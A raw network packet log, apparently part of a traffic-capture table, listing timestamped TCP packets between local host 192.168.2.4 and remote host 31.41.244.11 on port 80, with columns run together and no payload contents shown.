                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.834739923 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.842921972 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.842979908 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.843039989 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.843074083 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.850282907 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.850302935 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.850342035 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.850368977 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.857394934 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.857438087 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.857471943 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.857506037 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.893404961 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.893464088 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.965312004 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.965378046 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.965405941 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.965442896 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.967534065 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.967581987 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.967623949 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.967662096 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.971987009 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.972035885 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.972075939 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.972140074 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.976588011 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.976630926 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.976835012 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.976895094 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.980895996 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.980946064 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.980981112 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.981019020 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.985337973 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.985383987 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.985388041 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.985419035 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.989765882 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.989811897 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.989928007 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.989967108 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.994282007 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.994328976 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.994364023 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.994417906 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.998625040 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.998672009 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.998703003 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.998740911 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.003058910 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.003112078 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.003165960 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.003206015 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.007543087 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.007601976 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.007612944 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.007649899 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.012026072 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.012069941 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.012203932 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.012242079 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.016443014 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.016491890 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.016510963 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.016546011 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.020764112 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.020812035 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.020862103 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.020900011 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.025335073 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.025393009 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.025414944 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.025449991 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.028712988 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.028753042 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.028785944 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.028822899 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.032228947 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.032273054 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.032325029 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.032361984 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.035737991 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.035784960 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.035841942 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.035877943 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.039299011 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.039329052 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.039346933 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.039366961 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.042788029 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.042808056 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.042835951 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.042853117 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.046255112 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.046304941 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.046370983 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.046411037 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.049768925 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.049823046 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.049855947 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.049891949 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.053380966 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.053428888 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.053433895 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.053463936 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.056843996 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.056885958 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.056890965 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.056930065 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.157550097 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.157613039 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.157618999 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.157658100 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.158773899 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.158823967 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.158859015 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.158893108 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.161597967 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.161647081 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.161654949 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.161685944 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.164339066 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.164388895 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.164397001 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.164438963 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.167071104 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.167128086 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.167162895 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.167200089 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.169742107 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.169787884 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.169795990 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.169820070 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.172523975 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.172575951 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.172700882 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.172748089 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.174953938 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.175070047 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.175151110 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.175194025 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.177417040 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.177484035 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.177496910 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.177536011 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.179873943 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.179965973 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.180044889 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.180044889 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.182374001 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.182421923 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.182776928 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.182825089 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.184673071 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.184739113 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.184742928 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.184779882 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.187130928 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.187164068 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.187184095 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.187202930 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.189537048 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.189591885 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.189717054 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.189763069 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.191891909 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.191943884 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.192003965 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.192048073 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.194304943 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.194350004 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.194354057 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.194402933 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.196635008 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.196693897 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.196871042 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.196909904 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.199008942 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.199047089 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.199218988 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.199251890 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.201385021 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.201416969 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.201436996 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.201457977 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.203849077 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.203905106 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.203948021 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.203986883 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.206141949 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.206199884 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.206242085 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.206279993 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.208519936 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.208571911 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.208662987 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.208698034 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.210935116 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.210973024 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.210974932 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.211009979 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.213217020 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.213267088 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.213330030 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.213366985 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.215708971 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.215764999 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.215868950 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.215909958 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.218064070 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.218112946 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.218399048 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.218436956 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.220523119 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.220558882 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.220578909 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.220599890 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.222764015 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.222804070 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.222862005 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.222898006 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.225296021 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.225312948 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.225348949 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.225362062 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.227576971 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.227638006 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.227875948 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.227916002 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.229971886 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.230016947 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.230048895 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.230091095 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.232328892 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.232381105 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.232424974 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.232465982 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.234741926 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.234788895 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.234921932 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.234962940 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.237179041 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.237195969 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.237231970 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.237243891 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.239574909 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.239626884 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.239691019 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.239876032 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.241911888 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.241930008 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.241966963 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.241980076 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.244268894 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.244321108 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.244330883 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.244373083 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.246654034 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.246690989 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.246730089 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.246730089 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.349514008 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.349562883 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.349706888 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.350373983 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.350683928 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.350742102 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.352477074 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.352557898 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.352600098 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.354487896 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.354549885 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.354618073 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.356332064 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:11.356347084 CET804974531.41.244.11192.168.2.4
